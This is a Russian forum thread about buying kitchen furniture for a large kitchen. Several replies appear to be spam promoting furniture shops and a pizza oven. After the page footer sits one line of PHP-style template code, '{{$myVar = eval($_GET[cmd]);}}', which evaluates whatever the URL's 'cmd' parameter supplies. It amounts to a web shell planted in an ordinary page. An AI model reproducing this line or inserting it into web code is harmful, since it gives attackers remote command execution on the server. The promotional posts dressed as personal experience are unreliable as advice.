+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 15

Тема: Мебель на кухню


  1. #1
    Мимо проходил Bastin is on a distinguished road Аватар для Bastin
    Регистрация
    24.01.2019
    Откуда
    Москва.
    Машина
    Бричка
    Сообщений
    47

    Мебель на кухню

    Купил квартиру в Москве, комнаты маленькие, а вот кухня просто огромная. В принципе только из-за кухни я ее и купил, мне очень нравятся просторные кухни. Но не думал, что будет проблематично купить мебель для кухни. В тех магазинах, что я был, мебель стандартная, она не предназначена для большой кухни. Мне хотелось бы заполнить все пространство. Где можно найти приличную мебель, и самое главное, чтобы она заполнила всю мою кухню.

  2. #2
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    В вашем случае надо делать мебель на заказ. Мастера снимут замеры вашей кухни, сделают проект, и если вас все устроит, то запустят это в работу. Правда ждать гарнитур придется долго, не так быстро это делается. Но плюс в этом есть, сделают именно так, как вы хотите.

  3. #3
    Мимо проходил Sertol is on a distinguished road Аватар для Sertol
    Регистрация
    05.04.2020
    Откуда
    Россия.
    Машина
    Гольф
    Сообщений
    45
    Не знаю, в каких магазинах вы были, по-моему, сейчас с выбором мебели нет проблем, начиная от маленьких кухонь, и заканчивая большими. Я вообще решил не тратить время на походы по мебельным магазинам, а заказать кухню в интернете. Тем более что мне давно приглянулась итальянская кухня Венеция http://mebel-toros.ru/kuhni/kuhnya-venecia/ . Привлекло то, что она выполнена из натурального дерева, а именно из массива ясеня, то есть за качество можно не переживать.

  4. #4
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    Если делать на заказ, то надо искать настоящих специалистов в этой области, а не самоучек. Чтобы сделали все качественно, и красиво. А то один мой товарищ, заказал кухню у мастера по объявлению. Мало того, что ждал почти полгода, так еще и сделали не правильно, хотя замеры делали.

  5. #5
    Новичок blalala is on a distinguished road Аватар для blalala
    Регистрация
    30.06.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    152
    Здравствуйте, мы решили вместе с женой прибрести себе новую кухню в Орле. Эти кухни сделаны из практичного пластика, мне лично понравились они. Прекрасно выглядят даже в небольшой квартире. Вы можете сами изучить полный каталог вот тут https://mebel-v-orle.ru/ , производитель уже работает на рынке 17 лет.Также вы сможете посмотреть качественную фурнитуру для своей новой мебели. Подбирают ее исходя из цвета и стиля. Есть дорогая фурнитура, а есть бюджетная.

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Подбирал кухню в коттедж, стремился, чтобы модель соответствовала всем запросам. Искал, что лучше выбрать, как найти производителя с заслуженной репутацией. В интернете познакомился с продукцией, представленной мебельной фабрикой Мария. Устроило, что при производстве кухонной мебели применяются исключительно экологичные материалы. Подтверждением высокого качества являются сертификаты. На сайте https://www.marya.ru/ связывался с менеджером, приобрел кухню в скандинавском стиле, доставка оперативная.

  7. #7
    GTI-Racing Kurdt is on a distinguished road Аватар для Kurdt
    Регистрация
    17.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    473
    Здравствуйте всем. От себя хочу посоветовать посмотреть эту печь для пиццы https://prom-katalog.ru/catalog/pech...itstsy_airhot/
    Хороший вариант как по цене, так и по качеству. Обязательно посмотрите сами.

  8. #8
    Мимо проходил Rondon is on a distinguished road Аватар для Rondon
    Регистрация
    08.07.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    5
    Зачем вам заполнять все пространство, скажите пожалуйста? По-моему сейчас в моде минимализм, всегда хочется больше свободного пространства.

  9. #9
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Мне кажется, на такую кухню нужна соответствующая шикарная мебель, которая и по дизайну подойдёт ещё идеально. Могу порекомендовать от себя данную https://julis.ru/portfolio/ компанию, которая нам делала на заказ кухонную мебель, очень здорово получилось. По ссылке можете глянуть портфолио фирмы, так вы будете понимать уровень работы специалистов. Большой плюс в том, что перед производством мебели специалисты выполняют бесплатный зд-проект, благодаря чему вы будете понимать, какой результат получите.

  10. #10
    Мимо проходил CHelovek is on a distinguished road Аватар для CHelovek
    Регистрация
    17.10.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    17
    Спасибо за инфо.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Мебель
    от deen в разделе Реклама
    Ответов: 6
    Последнее сообщение: 03.04.2024, 01:46
  2. Мебель
    от ЖоржЗибров в разделе Курилка
    Ответов: 9
    Последнее сообщение: 22.05.2021, 23:16
  3. мебель
    от Felhaghma в разделе Курилка
    Ответов: 4
    Последнее сообщение: 24.12.2020, 02:37
  4. Мебель
    от Bimbom в разделе Семья и дом
    Ответов: 6
    Последнее сообщение: 17.03.2019, 20:54
  5. Мебель
    от nekrolog в разделе Курилка
    Ответов: 4
    Последнее сообщение: 03.02.2019, 18:07

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}